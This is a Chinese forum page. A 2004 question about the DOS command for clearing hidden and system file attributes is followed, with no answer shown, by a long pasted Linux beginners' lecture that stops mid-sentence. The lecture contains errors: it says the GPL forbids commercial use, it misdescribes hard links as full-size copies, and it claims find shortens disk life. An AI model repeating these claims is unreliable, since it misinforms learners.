请问:DOS下去掉隐藏性和系统性的命令是什么?

BlankMe 2004-02-18 11:03:29
请问:DOS下去掉隐藏性和系统性的命令是什么?
谢谢!
...全文
27 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
Linux 操作系统基础教程 清华大学信息学院计算机系 目 录 前言..................................................................................................................................................2 第一讲 Linux基础...........................................................................................................................2 一.什么是Linux?.................................................................................................................2 二.安装Linux的好处?.........................................................................................................3 三.如何得到Linux?.............................................................................................................3 四.如何得到Linux的最新消息?.........................................................................................3 五.Linux操作系统上有什么应用?.....................................................................................4 六.在那里可以找到讨论区?..............................................................................................5 七.安装过程..........................................................................................................................5 第二讲 Linux基础进阶...................................................................................................................5 一.Linux的文件系统结构.....................................................................................................6 二. 文件类型...........................................................................................................................7 三.Linux基本操作命令............................................................................................................8 四.基本的系统管理命令.......................................................................................................14 五.关於 Process 处理的指令...............................................................................................16 六. 关於字串处理的指令.....................................................................................................17 七. 网路上查询状况的指令.................................................................................................17 八. 网路指令.........................................................................................................................18 九. 关於通讯用的指令.........................................................................................................21 十. 编译器( Compiler )..........................................................................................................22 十一. 有关列印的指令.........................................................................................................22 第三讲 Linux下的网络服务,配置问题和常用工具.................................................................24 一.Linux下的网络服务.......................................................................................................24 二.几种重要的配置文件.......................................................................................................26 三.Linux下常用的工具软件..................................................................................................28 尾语................................................................................................................................................31 前言 Linux 是在 1991 年发展起来的与 UNIX兼容的操作系统,可以免费使用,它的源代码 可以自由传播且可任人修改、充实、发展,开发者的初衷是要共同创造一个完美、理想并 可以免费使用的操作系统。 我们并不能使同学们通过这次系列讲座成为一个 UNIX 类操作系统的高手,这次系列 讲座的目的就是在同学们中间普及 Linux 基础知识,为今后我们更加接近的了解 Linux 做一 个好的开端。 第一讲 Linux基础 在这一讲中,我们主要是了解一下 Linux 的概况,以及对 Linux 有一个初步的感认识。 一.什么是Linux? Linux 是一个以 Intel 系列 CPU(CYRIX,AMD 的 CPU也可以)为硬件平台,完全免费的 UNIX 兼容系统,完全适用于个人的 PC。它本身就是一个完整的 32 位的多用户多任务操作 系统,因此不需要先安装 DOS 或其他的操作系统(MS Windows, OS2, MINIX..)就可以进 行直接的安装。 Linux的最早起源是在1991年10月5日由一位芬兰的大学生Linux Torvalds (Torvalds@kruuna.helsinki.fi)写了 Linux核心程序的 0.02 版开始的,但其后的发展却几乎都 是由互联网上的 Linux社团(Linux Community)互通交流而完成的。Linux 不属于任何一 家公司或个人,任何人都可以免费取得甚至修改它的源代码(source code)。Linux 上的大部 分软件都是由 GNU倡导发展起来的,所以软件通常都会在附着 GNU Public License(GPL) 的情况下被自由传播。GPL 是一种可以使你免费获得自由软件的许可证,因此 Linux 使用 者的使用活动基本不受限制(只要你不将它用于商业目的),而不必像使用微软产品是那样, 2需要为购满许可证付出高价还要受到系统安装数量的限制。我在讲义的最后面附有 GPL 的 非官方中文译稿。目前 Linux 中国的发行版本(Linux Distribution)主要有 Red Hat (红帽子) , Slackware, Caldera, Debian, Red Flag (红旗) , Blue Point (蓝点) , Xteam Linux (冲浪) , Happy Linux(幸福Linux), Xlinux 等若干种,我推荐同学们使用的发行版本是 Red Hat(事实标 准)和 Xlinux(安装最容易)。 二.安装Linux的好处? Linux的核心具有 Windows 无法比拟的稳定和高效率,在不使用 X Windows 的情况 下,它占用系统资源较少,可以使一台 Intel486摇身一变成为高效工作站。对于想要学习 UNIX的用户来说,使他们熟悉 UNIX 操作环境,通往"骨灰级"高手境界的一大捷径。最重 要的是,Linux 上有公认的 C 语言世界最好的编译器 gcc,如果你想得到一个效率更高的开 发环境(并不一定是最友好的,但一定是最强大的),我建议你一定要好好的熟悉一下 Linux。 三.如何得到Linux? 据我所知,大多数的 Linux 发行版本(Linux distribution)和核心(Kernel)都是可以 从网上下载的,但是我不推荐易用这种方法得到 Linux,因为仅仅核心就有几十个 Mbit 的 数据量,而一个完整的发行版本大概都是 1Gbit 左右的数据量,你自己可以估计一下得用多 少时间来下载它们?我建议你最好去软件商店买光盘来,因为 Linux 的产品光盘是非常便宜 的,连带许可证 GPL 在内你大概支付 50 元人民币就可以,而具有同样功能的 Windows NT 4.0 你至少得付出 17000元人民币(有一点需要声明:在你购买光盘时 GPL 许可证你是不会 肉眼看到的)。直接到商店去买,可以省去你很多麻烦,因为从网上下载的 Linux有很多它 还是要求你有光盘刻录工具将安装文件刻到光盘上。 四.如何得到Linux的最新消息? 关于 Linux 的站点现在到处都是,我这里向大家推荐的是一个关于 Linux 核心最新消息 的一个网站,你可以得到核心(Kernel)发展情况的最新信息。网址如下: http://www.kernel.org 另外还有一个非常著名的讨论组,你也可以去看看:http://www.linuxforum.net 另外还有一 个我常去的讨论组,这个讨论组是有高手专门维护的,而且回应贴子的速度很快: http://www.coventive.com.cn/club/default.htm在我这份讲义快写完的时候,又有一个非常好的 自由软件团体出现了,那就是 AKA,大家可以到他们的网页上去看看,里面有许多很实用的 3信息:http://www.aka.org.cn 五.Linux操作系统上有什么应用? Linux 上有丰富的的应用软件,在这里我给大家做一个简单的介绍,具体它们是什么样 子我会在讲座上为大家一一演示。 文本处理方面(控制台界面,X Window界面在后面介绍) vi 最令 UNIX类操作系统初学者裹足不前的 editor,然而只要你习惯于操作,你会觉得 它比任何的 editor都好用,且功能强大。 pico 一种风格很像 Microsoft DOS的 EDIT 的一种文本编辑器。 中文化方面 XCIN+Crxvt 缺省的 Linux 系统是不支持显示中文的,虽然现在国内涌现出许多著名的 Linux 汉化厂商,但是一些著名的 Linux distribution 如 Red Hat、Debian、Caldera 仍然不支 持中文的输入和输出。这套汉化工具组合在控制台(console)方式和 X Window方式下都可 以显示和输入汉字信息。 Cxterm 可以很容易的自行设置输入法,或者修改现有的输入法表格。 视窗界面(window manager)方面 KDE 这是 X Window System使用率最高的 Window Manager。 lFvwm 公认的最为好用的 Window Manager之一。 Fvwm95 拥有和 Microsoft Win95 同样界面的 Window Manager。 Afterstep 公认的最好看的 Window Manager,但号内存也很大。 Enlightenment 界面最华丽的 Window Manager, Win95 和它相比简直就是 nothing,但是 号内存太大,有点华而不实。 lIcewin 又一个极富个的 Window Manager。 视窗应用软件方面 WWW Browser Netscape公司的 navigator3.x 和communicator4.x 版可用,使用方法和 MS Windows上一样。 图像处理 GIMP是类似于 Photoshop的绘图软件,号称是 Linux 上最强的绘图软件。 看图工具 MTV 这是一个可以播放 VCD的软件,但是它是共享软件(Shareware),不是免费软件, 我们也得不到它的源代码。 Star Office 这是一套著名的办公软件,我个人认为它无论在界面上还是在功能上都强于 Microsoft Office 产品。唯一的缺憾是他不支持汉字,无论 GB 还是 BIG5。 Word Perfect 这是一个非常精彩的字处理软件,功能类似于 Microsoft Word。 4文杰字处理系统 这是一套由韩国人开发的字处理系统,功能强大,有专门的中文版推出, 类似于 Microsoft Word。 编译环境 gcc 公认的C 语言世界中功能最为强大的编译器,但是界面不是很友好。 除此之外还有 FORTRAN、 Pascal、 GNU make、 GNU debugger、 GNU LISP、 GNU PERL、 TCL。 这里因为本人对这些编译工具都不熟悉,因此不多介绍。 MS Windows的模拟环境 WINE 可以使绝大多数的 16 位 MS Window程序运行在这个模拟环境中。但是不支持 32 位的程序。 六.在那里可以找到讨论区? 大家最熟悉的是北邮的 BBS: 202.204.7.235 port:23 七.安装过程 这是非常重要的一部分,希望大家仔细了解本部分内容。 就我个人认为,对于初学者来说,Linux 的安装过程是相当难的,新手往往会遇到系统 屡装不成的情况。遇到这种事情,是非常痛苦的,但是几乎每个新手又都会遇到,因此我 觉得安装过程应当仔细的说明一下。但是由于篇幅有限,我不见这个这个问题在讲义的正 文中陈述,而是把它放在附文 2 中仔细说明。希望没有安装过 Linux 的同学们将这篇文章看 一看。我想在上课的时候我会给大家演示一遍安装的过程。 第二讲 Linux基础进阶 经过上一节课的探讨,我想同学们应该对 Linux 有了一个初步的感认识,但我们的 认识还只是处在一个尚需进步的表层上。通过这一节的学习,同学们会对 Linux 的体系结构, 它的基本操作,基本功能有一个更进一步的认识。 5 一.Linux的文件系统结构 Linux的文件系统和MS-Windows的文件系统有很大的不同,对于微软视窗系统的文件 结构我在这里不再多说,我们主要了结一下 linux的文件系统结构. linux 只有一个文件树,整 个文件系统是以一个树根"/"为起点的,所有的文件和外部设备都以文件的形式挂结在这个文 件树上,包括硬盘,软盘,光驱,调制解调器等,这和以"驱动器盘符为基础的 MS-Windows 系统 是大不相同的.Linux 的文件结构体现了这个操作系统简洁清析的设,常我们能够接触到的 linux 发行版本的根目录大都是以下结构: /bin /etc /lost+found /sbin /var /boot /root /home /mnt /tmp /dev /lib /proc /usr 现在我将这些目录给大家做一个简要的介绍: 1. /bin和/sbin 使用和维护UNIX和Linux系统的大部分基本程序都包含在/bin和/sbin里,这两个目录 的名气之所以包含 bin,是因为可执行的程序都是二进制文件(binary files). /bin 目录通常用来存放用户最常用的基本程序,如: login Shells 文件操作实用程序 系统实用程序 压缩工具 /sbin 目录通常存放基本的系统和系统维护程序,如: fsck fdisk mkfs shutdown lilo init 存放在这两个目录中的程序的主要区别是:/sbin 中的程序只能由 root(管理员)来执行. 2. /etc 这个目录一般用来存放程序所需的整个文件系统的配置文件,其中的一些重要文件如 下: passwd shadow fstab hosts motd profile shells services lilo.conf 3. /lost+found 这个目录专门是用来放那些在系统非正常菪机后重新启动系统时,不知道改网哪里恢复 的"流浪"文件的。 4. /boot 这个目录下面存放着和系统启动有关系的各种文件,包括系统的引导程序和系统核心 部分。 65. /root 这是系统管理员(root)的主目录。 6. /home 系统中所有用户的主目录都存放在/home 中,它包含实际用户(人)的主目录和其他用户 的主目录.Linux同 UNIX 的不同之处是,Linux的 root 用户的主目录通常是在/root或 /home/root,而 UNIX 通常是在/。 7. /mnt 按照约定,像 CD-ROM,软盘,Zip盘,或者 Jaz这样的可以动介质都应该安装在/mnt 目录下,/mnt 目录通常包含一些子目录,每个子目录是某种特定设备类型的一个安装点。 例如: /cdrom /floppy /zip /win .... 如果我们要使用这些特定设备,我们需要用 mount 命令从/dev 目录中将外部设备挂接 过来。在这里大家可能看到了有一个 win 的目录,这是我的机子上面做的一个通向 windows 文件系统的挂接点,这样我通过访问这个目录就可以访问到我在 windows 下面的文件了。 但如果你的 windows 文件系统是 NTFS 格式,那么这个办法就不行了。 8. /tmp和/var 这两个目录用来存放临时文件和经常变动的文件。 9. /dev 这是一个非常重要的目录,它存放着各种外部设备的镜像文件,其中有一些内容我们 是要牢牢记住的。例如第一个软盘驱动器的名字是 fd0;第一个硬盘的名字是 hda,硬盘中的 第一个分区是 hda1,第二个分区是 hda2;第一个光盘驱动器的名字是 hdc;此外,还用 modem 和其他外设的名字,在这么多的名字中,我们只需要记住最最常用的那几个外设就可以了。 10. /usr 按照约定,这个目录用来存放与系统的用户直接相关的程序或文件,这里面有每一个 系统用户的主目录,就是相对于他们的小型"/"。 11. /proc 这个目录下面的内容是当前在系统中运行的进程的虚拟镜像,我们在这里可以看到由 当前运行的进程号组成的一些目录,还有一个记录当前内存内容的 kernel 文件。 就个人经验,我认为这些目录以及在它们下面应该存储什么内容,我们都应当很熟练的 记下来,这对于我们进一步的使用系统是很有帮助的。 二. 文件类型 本来我是想把基本操作命令放在这里介绍一下,但是这些命令中又不少是涉及到文件类 7型的,所以我就只好先介绍一下文件类型了。 Linux 的文件类型大致可分为五类,而且它支持长文件名,不论是文件还是目录名,最 长可以达到 256 个字节。如果你能够用 128 个汉字写一片小作文,那你也可以用它来做某 个文件的文件名(当然这里面不能有不合规定的命名字符存在)。 1. 一般文件 一般文件,例如纯文本文件 mtv-0.0b4.README,设置文件 lilo.conf,记录文件 ftp.log 等等都是。一般类型的文件在控制台的显示下都没有颜色,系统默认的是白色。 2. 目录 至于目录是什么意思我就不解释了,我的任务是要告诉大家,你可以用 cd+目录名进 入到这个目录中去,而这个目录在控制台下显示的颜色是蓝色的,非常容易辨认。如果你 用 ls -l 来观看它们,会发现它们的文件属(共 10 个字符)的一个字符是 d,这表明它是一 个目录,而不是其它的东西。 三.Linux基本操作命令 首先介绍一个名词"控制台(console)",它就是我们通常见到的使用字符操作界面的 人机接口,例如 dos。我们说控制台命令,就是指通过字符界面输入的可以操作系统的命令, 例如dos命令就是控制台命令。我们现在要了解的是基于Linux操作系统的基本控制台命令。 有一点一定要注意,和 dos 命令不同的是,Linux 的命令(也包括文件名等等)对大小 写是敏感的,也就是说,如果你输入的命令大小写不对的话,系统是不会做出你期望的响 应的。 1. ls 这个命令就相当于 dos 下的 dir命令一样,肯定是我第一个就要介绍的,这也是 Linux 控制台命令中最为重要几个命令之一。ls 最常用的参数有三个: -a -l -F。 ls -a Linux 上的文件以.开头的文件被系统视为隐藏文件,仅用 ls 命令是看不到他们的,而用 ls -a 除了显示 一般文件名外,连隐藏文件也会显示出来。 ls -l(这个参数是字母 L 的小写,不是数字 1) 这个命令可以使用长格式显示文件内容,如果需要察看更详细的文件资料,就要用到 ls -l 这个指令。例如我在某个目录下键入 ls -l 可能会显示如下信息(最上面两行是我自己加 的): 位置 1 2 3 4 5 6 7 文件属 文件数 拥有者 所属的group 文件大小 建档日期 文件名 drwx------ 2 Guest users 1024 Nov 21 21:05 Mail 8 -rwx--x--x 1 root root 89080 Nov 7 22:41 tar* -rwxr-xr-x 1 root bin 5013 Aug 15 9:32 uname* lrwxrwxrwx 1 root root 4 Nov 24 19:30 zcat->gzip -rwxr-xr-x 1 root bin 308364 Nov 29 7:43 zsh* -rwsr-x--- 1 root bin 9853 Aug 15 5:46 su* 下面,我为大家解释一下这些显示内容的意义。 第一个栏位,表示文件的属。 Linux 的文件基本上分为三个属:可读(r),可写(w),可执行(x)。但是这里有 十个格子可以添(具体程序实现时,实际上是十个 bit 位)。第一个小格是特殊表示格,表 示目录或连结文件等等,d 表示目录,例如 drwx------;l 表示连结文件,如 lrwxrwxrwx;如果 是以一横"-"表示,则表示这是文件。其余剩下的格子就以每 3 格为一个单位。因为 Linux 是多用户多任务系统,所以一个文件可能同时被许多人使用,所以我们一定要设好每个文 件的权限,其文件的权限位置排列顺序是(以-rwxr-xr-x 为例): rwx(Owner)r-x(Group)r-x(Other) 这个例子表示的权限是:使用者自己可读,可写,可执行;同一组的用户可读,不可 写,可执行;其它用户可读,不可写,可执行。另外,有一些程序属的执行部分不是 X, 而是 S,这表示执行这个程序的使用者,临时可以有和拥有者一样权力的身份来执行该程序。 一般出现在系统管理之类的指令或程序,让使用者执行时,拥有 root身份。 第二个栏位,表示文件个数。 如果是文件的话,那这个数目自然是 1 了,如果是目录的话,那它的数目就是该目录 中的文件个数了。 第三个栏位,表示该文件或目录的拥有者。 若使用者目前处于自己的 Home,那这一栏大概都是它的账号名称。 第四个栏位,表示所属的组(group)。 每一个使用者都可以拥有一个以上的组,不过大部分的使用者应该都只属于一个组,只 有当系统管理员希望给予某使用者特殊权限时,才可能会给他另一个组。 第五栏位,表示文件大小。 文件大小用 byte 来表示,而空目录一般都是 1024byte,你当然可以用其它参数使文件 显示的单位不同,如使用 ls -k 就是用 kb 莱显示一个文件的大小单位,不过一般我们还是以 byte 为主。 第六个栏位,表示创建日期。 以"月,日,时间"的格式表示,如 Aug 15 5:46表示 8 月15日早上 5:46分。 第七个栏位,表示文件名。 我们可以用 ls -a 显示隐藏的文件名。 Ls -F(注意,是大写的 F) 9 使用这个参数表示在文件的后面多添加表示文件类型的符号,例如*表示可执行,/表示 目录,@表示连结文件,这都是因为使用了-F这个参数。但是现在基本上所有的 Linux 发 行版本的 ls都已经内建了-F参数,也就是说,不用输入这个参数,我们也能看到各种分辨 符号。 2. cd命令 这个命令是用来进出目录的,它的使用方法和在 dos 下没什么两样,所以我觉得没什么 可说的,但有两点我补充一下。 首先,和dos 不同的是Linux 的目录对大小写是敏感的,如果大小写没拼对,你的 cd 操作是成功不了的。 其次,cd如果直接输入,cd 后面不加任何东西,会回到使用者自己的 Home Directory。 假设如果是 root,那就是回到/root.这个功能同 cd ~是一样的。 3. mkdir,rmdir 命令 mkdir 命令用来建立新的目录,rmdir用来删除以建立的目录,这两个指令的功能不再 多加介绍,他们同 dos下的 md,rd 功能和用法都是基本一样的。 4. cp命令 这个命令相当于 dos下面的 copy命令,具体用法是: cp -r 源文件(source) 目的文件(target) 参数 r是指连同元文件中的子目录一同拷贝。熟悉 dos 的读者用起这个命令来会觉得更 方便,毕竟比在 dos 下面要少敲两下键盘。 5. rm 命令 这个命令是用来删除文件的,和 dos 下面的 rm(删除一个空目录)是有区别的,大家 千万要注意。Rm命令常用的参数有三个: -i,-r,-f。 比如我现在要删除一个名字为 text 的一个文件: rm -i test 系统会询问我们:"rm:remove 'test'?y",敲了回车以后,这个文件才会真的被删除。之 所以要这样做,是因为 linux 不象dos那样有 undelete 的命令,或者是可以用 pctool 等工具 将删除过的文件救回来,linux 中删除过的文件是救不回来的,所以使用这个参数在删除前 让你再确定一遍,是很有必要的。 rm -r 目录名 这个操作可以连同这个目录下面的子目录都删除,功能上和 rmdir相似。 rm -f 文件名(目录名) 这个操作可以进行强制删除。 6. mv 命令 这个命令的功能是移动目录或文件,引申的功能是给目录或文件重命名。它的用法同 10dos 下面的 move 基本相同,这里不再多讲。当使用该命令来移动目录时,他会连同该目录 下面的子目录也一同移走。另外因为 linux 下面没有 rename 的命令,所以如果你想给一个 文件或目录重命名时可以用以下方法: mv 原文件(目录)名 新的文件(目录)名 7. du,df 命令 du 命令可以显示目前的目录所占的磁盘空间,df 命令可以显示目前磁盘剩余的磁盘空 间。 如果 du 命令不加任何参数,那么返回的是整个磁盘的使用情况,如果后面加了目录的 话,就是这个目录在磁盘上的使用情况(这个功能可是 dos 没有的呦)。不过我一般不喜欢 用 du,因为它给出的信息是在是太多了,我看不过来,而 df这个命令我是最常用的,因为 磁盘上还剩多少空间对我来说是很重要的。 8. cat 命令 这个命令是 linux 中非常重要的一个命令,它的功能是显示或连结一般的 ascii 文本文 件。cat是 concatenate 的简写,类似于 dos 下面的 type 命令。它的用法如下: cat text 显示 text 这个文件 cat file1 file2 依顺序显示 file1,file2的内容 cat file1 file2>file3 把 file1,file2 的内容结合起来,再"重定向(>)"到 file3文件中。 "〉"是一个非常有趣的符号,是往右重定向的意思,就是把左边的结果当成是输入,然 后输入到 file3 这个文件中。这里要注意一点是 file3 是在重定向以前还未存在的文件,如果 file3 是已经存在的文件,那么它本身的内容被覆盖,而变成 file1+file2的内容。 如果〉左边没有文件的名称,而右边有文件名,例如: cat >file1 结果是会"空出一行空白行",等待你输入文字,输入完毕后再按[Ctrl]+[c]或[Ctrl]+[d], 就会结束编辑,并产生 file1 这个文件,而 file1 的内容就是你刚刚输入的内容。这个过程和 dos 里面的copy con file1的结果是一样的。 另外,如果你使用如下的指令: cat file1>>file2 这将变成将 file1 的文件内容"附加"到 file2 的文件后面,而 file2 的内容依然存在,这种 重定向符〉〉比〉常用,可以多多利用。 9. more,less命令 这是两个显示一般文本文件的指令。 如果一个文本文件太长了超过一个屏幕的画面,用 cat 来看实在是不理想,就可以试试 more 和 less两个指令。More 指令可以使超过一页的文件临时停留在屏幕,等你按任何的一 个键以后,才继续显示。而 less 除了有 more 的功能以外,还可以用方向键往上或网下的滚 11动文件,所以你随意浏览,阅读文章时,less 是个非常好的选择。 10. clear 命令 这个命令是用来清除屏幕的,它不需要任何参数,和 dos 下面的 clr具有相同的功能, 如果你觉得屏幕太紊乱,就可以使用它清除屏幕上的信息。 11. pwd命令 这个命令的作用是显示用户当前的工作路径,这个命令不用多说,大家一试即知。 12. ln命令 这是 linux中又一个非常重要命令,请大家一定要熟悉。它的功能是为某一个文件在另 外一个位置建立一个同不的链接,这个命令最常用的参数是-s,具体用法是: ln -s 源文件 目标文件 当我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都 放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在其它的目录下 用 ln 命令链接(link)它就可以,不必重复的占用磁盘空间。例如: ln -s /bin/less /usr/local/bin/less -s 是代号(symbolic)的意思。 这里有两点要注意:第一,ln 命令会保持每一处链接文件的同步,也就是说,不论 你改动了哪一处,其它的文件都会发生相同的变化;第二,ln 的链接又软链接和硬链接两 种,软链接就是 ln -s ** **,它只会在你选定的位置上生成一个文件的镜像,不会占用磁盘空 间,硬链接 ln ** **,没有参数-s, 它会在你选定的位置上生成一个和源文件大小相同的文件, 无论是软链接还是硬链接,文件都保持同步变化。 如果你用ls 察看一个目录时,发现有的文件后面有一个@的符号,那就是一个用 ln 命 令生成的文件,用 ls -l命令去察看,就可以看到显示的 link 的路径了。 13. man命令 如果你的英文足够好,那完全可以不靠任何人就精通 linux,只要你会用 man。Man 实 际上就是察看指令用法的 help,学习任何一种 UNIX类的操作系统最重要的就是学会使用 man 这个辅助命令。man 是 manual(手册)的缩写字,它的说明非常的详细,但是因为它都是 英文,看起来非常的头痛。建议大家需要的时候再去看 man,平常吗,记得一些基本用法 就可以了。 14. logout 命令 一看就知道了,这是退出系统的命令,我就不多说了。要强调的一点是,linux是多用 户多进程的操作系统,因此如果你不用了,退出系统就可以了,关闭系统你就不用操心了, 那是系统管理员的事情。但有一点切记,即便你是单机使用 linux,logout 以后也不能直接 关机,因为这不是关机的命令。 15. Mount 命令 12这是 Linux 初学者问得最多的问题。由于大家已习惯了微软的访问方法,总想用类似 的思路来找到软盘和光盘。但在 Linux 下,却沿袭了 UNIX 将设备当作文件来处理的方法。 所以要访问软盘和光盘,就必须先将它们装载到 Linux 系统的/mnt 目录中来。 装载的命令是 mount,格式如下:mount -t 文件系统类型 设备名 装载目录 文件 系统类型就是分区格式,Linux 支持的文件系统类型有许多: msdos DOS 分区文件系统类型 vfat 支持长文件名的 DOS 分区文件(可以理解为 Windows 文件)系统类型 iso9660 光盘的文件系统类型 ext2 Linux 的文件系统类型 ...... 设备名,指的是你要装载的设备的名称。软盘一般为/dev/fd0 fd1;光盘则根据你的 光驱的位置来决定,通常光驱装在第二硬盘的主盘位置就是/dev/hdc;如果访问的是 DOS 的 分区,则列出其设备名,如/dev/hda1 是指第一硬盘的第一个分区。 装载目录,就是你指 定设备的载入点。 z 装载软盘 首先用 mkdir /mnt/floppy 在/mnt 目录下建立一个空的 floppy目录,然后输入 mount -t msdos /dev/fd0 /mnt/floppy 将 DOS 文件格式的一张软盘装载进来,以后就可以在 /mnt/floppy目录下找到这张软盘的所有内容。 z 装载 Windows 所在的C 盘 mkdir /mnt/c 在/mnt 目录下建立一个空的 c 目录; mount -t vfat /dev/hda1 /mnt/c 将Windows 的C盘按长文件名格式装载到/mnt/c 目 录下,以后在该目录下就能读写 C盘根目录中的内容 z 装载光盘 mkdir /mnt/cdrom 在/mnt 目录下建立一个空的 cdrom 目录; mount -t iso9660 /dev/hdc /mnt/cdrom 将光盘载入到文件系统中来, 将在/mnt/cdrom 目录下找到光盘内容。有的 Linux 版本允许用 mount /dev/cdrom 或 mount /mnt/cdrom 命 令装载光盘。 要注意的是,用 mount命令装入的是软盘、光盘,而不是软驱、光驱。有些初学者容易 犯一个毛病,以为用上面命令后,软驱就成了/mnt/floppy,光驱就成了/mnt/cdrom,其实 不然,当你要换一张光盘或软盘时,一定要先卸载,再对新盘重新装载。 z 卸载 卸载的命令格式是:umonut 目录名,例如要卸载软盘,可输入命令 umonut /mnt/floppy。 要注意的是,在卸载光盘之前,直接按光驱面板上的弹出键是不会起作用的。 13 四.基本的系统管理命令 系统管理基本上可以分为两种,一种是 root(系统管理员)对 linux的系统管理部分, root 本身的职责就是负责整个 linux系统的运行稳定,增加系统安全,校验使用者的身份, 新增使用者或删除恶意的使用者,并明确每一个在机器上的使用者权限等等。另一种就是 每一个使用者(包括 root)对自己文件的权限管理。因为 linux 是多用户多任务系统,每一 个使用者都有可能将其工作的内容或是一些机密的文件放在 Linux工作站上,所以对每个 文件或是目录的归属和使用权,都要有非常明确的规定。下面我就按管理员和一般用户分 类来介绍基本的系统管理命令。 z 管理员使用的系统管理指令 1. adduser 命令 新增使用者账号的命令,如果你想新增一个叫做 jack 的用户,那么需在控制台下输入: adduser jack 这样就增加了一个名字为 jazk 的用户,要注意这里对大小写是敏感的。另外,新增的 用户是没有口令的,你还应当为用户设置口令或者是吩咐用户在第一次登录系统的时候为 自己设置口令。 2. passwd命令 这个命令可以修改特定用户的口令,使用格式是: passwd 用户名 这是,系统会提示你输入新密码,你输入第一遍后,还要输入第二遍进行确认。输入 两遍相同的密码之后,系统就接受了新的密码。如果这个命令是一般用户来使用的话,那 就只能改变它自己的密码。 3. find,whereis,locate命令 这三个命令都是用来查找文件的,使用格式是: find 路径名称 -name 文件名 参数(我们这里就不讨论参数了) whereis 文件名 locate 文件名 一般来说,find 命令功能最为强大,但是对硬件的损耗也是最大的,当你使用 find 去 查找你个文件时,你会发现硬盘等在不停的闪动,这就意味着你的硬盘可能会比别人的少 用个三四年。当你使用whereis 或locate 去查找文件时,你会发现硬盘却是安安静静的,这 是因为这两个命令是从系统的数据库中查找文件,而不是去拼命的读硬盘。所以,如果平 常你只是想找一些笑文件的话,使用 whereis或 locate 就可以了,如果你是要进行系统管理 的工作,那么使用 find再加上一些参数就可以满足你的要求了。 144. su命令 这个命令可以让普通用户变成具有管理员权限的超级用户(superuser),只要它知道知 道管理员的密码就可以。多用户多任务系统的强调的重点之一就是系统的安全,所以应 避免直接使用 root 身份登录系统去做一些日常的操作,因为时间一久 root 密码就有可能 被知道而危害到系统安全。所以平常应避免用 root 身份登录,即使要管理系统,也请尽量 使用 su 指令来临时管理系统,然后记住定期的更换 root 密码。 加入你现在是以一个普通用户的身份登录系统,现在你输入: su 系统会要求你输入管理员的口令,当你输入正确的密码后,就可以获得全部的管理员 权限,这是你就是超级用户(superuser)。但你执行完各种管理操作以后,只要输入 logout 就 可以退回到原先的那个普通用户的状态。 5. shutdown,halt 命令 这两个命令是用来关闭 linux 操作系统的。 在前面我说过,作为一个普通用户是不能够随便关闭系统的,因为虽然你用完了机器, 可是这时候可能还有其它的用户正在使用系统。因此,关闭系统或者是重新启动系统的操 作只有管理员才有权执行。另外 linux 系统在执行的时候会用部分的内存作缓存区,如果内 存上的数据还没有写入硬盘,就把电源拔掉,内存就会丢失数据,如果这些数据是和系统 本身有关的,那么会对系统造成极大的伤害。一般,我们建议在关机之前执行三次同步指 令 sync,可以用分号";"来把指令合并在一起执行,如: # sync;sync;sync 使用 shutdown 关闭系统的时候有以下几种格式: shutdown (系统内置 2分钟关机,并传送一些消息给正在使用的 user) shutdown -h now (下完这个指令,系统立刻关机) shutdown -r now (下完这个指令,系统立刻重新启动,相当于 reboot) shutdown -h 20:25 (系统会在今天的 20:25 关机) shutdown -h +10 (系统会在十分钟后关机) 如果在关机之前,要传送信息给正在机器上的使用者,可以加"-q"的参数,则会输出系 统内置的 shutdown 信息给使用者,通知他们离线。 halt 命令就不用多说了,只要你输入 halt,系统就会开始进入关闭过程,其效果和 shutdown -h now是完全一样的,我每次关机的时候都是用 halt。 6. reboot 命令 一看这个词,就知道这个命令是用来重新启动系统的。 当你输入 reboot 后,你就会看到系统正在将一个一个的服务都关闭掉,然后再关闭文 件系统和硬件,接着机器开始重新自检,重新引导,再次进入 linux 系统。 15z 普通用户使用的系统管理指令 1. chown命令 这个命令的作用是改变文件的所有者。 如果你有一个文件名为 classment.list 的文件,所有权要给于另一个账号为 golden的同 学,则可用 chown 来实现这个操作,但是当你改变了文件的所有者以后,该文件虽然在你 的 Home 目录下,可是你已经无任何修改或删除该文件的权限了,这一点同学们千万要注 意。通常会用到这个指令的时机,应该是你想让 linux 机器上的某位使用者到你的 Home 下 去用谋个文件是会用到。不过,泼出去的水就收不回来了,你用这个命令的时候可一定要 想清楚呦。 2. chmod命令 这个命令用来改变目录或文件的属,是 linux 中一个应当熟悉的命令。 对这个命令,使用的方法很多,鉴于篇幅的原因,我只例出其中我最常用的一种。前 面讲过,一个文件用 10个小格来记录文件的权限。前三个小格是拥有者(user)本身的权 限,中间三个小格是和使用者同一组的成员(group)的权限,最后三个小格是表示其它使 用者(other)的权限。现在我们用三位的 2 进制数来表示相应的三小格的权限,例如: 111 rwx 101 r-x 011 -wx 001 -x 100 r- 这样一来,我们就可以用三个十进制的数来表示一个文件属位上的十个格,其中每 一个十进制数大小等于代表每三格的那个三位的二进制数。例如,如果一个文件的属是: rwxr-r--,那么我们就可以用 744 来代表它的权限属;如果一个文件的属是:rwxrwxr--, 那它对应的三个十进制数就是 774。这样一来我们就可以用这种简便的方法指定文件的属 了。例如,我想把一个文件 test.list的属设置为 rwxr-x---,那么我只要执行: chmod 750 test.list 就可以了,对于改变后的权限,你用 ls -l 就可以看到。 五.关於 Process 处理的指令 1. ps ps 是用来显示目前你的 process 或系统 processes 的状况。 以下列出比较常用的参数: 其选项说明如下: -a 列出包括其他 users 的 process 状况。 -u 显示 user - oriented 的 process 状况 。 -x 显示包括没有 terminal 控制的 process 状况 。 -w 使用较宽的显示模式来显示 process 状况 。 16我们可以经由 ps 取得目前 processes 的状况,如 pid , running state 等。 2. kill kill 指令的用途是送一个 signal 给某一个 process 。因为大部份送的都是用来杀掉 process 的 SIGKILL 或 SIGHUP ,因此称为 kill 。kill 的用法 为: kill [ -SIGNAL ] pid ... kill –l SIGNAL 为一个 singal 的数字,从 0 到 31 ,其中 9 是 SIGKILL ,也就是一般用来 杀掉一些无法正常 terminate 的讯号。其馀讯号的用途可参考 sigvec(2)中对 signal 的 说明。你也可以用 kill -l 来察看可代替 signal 号码的数目字。kill 的详细情形请参 阅 man kill。 六. 关於字串处理的指令 1. echo echo 是用来显示一字串在终端机上。□ echo -n 则是当显示完之後不会有跳行的动 作。 2. grep/fgrep grep 为一过滤器,它可自一个或多个档案中过滤出具有某个字串的行,或是自标准 输入过滤出具有某个字串的行。 fgrep 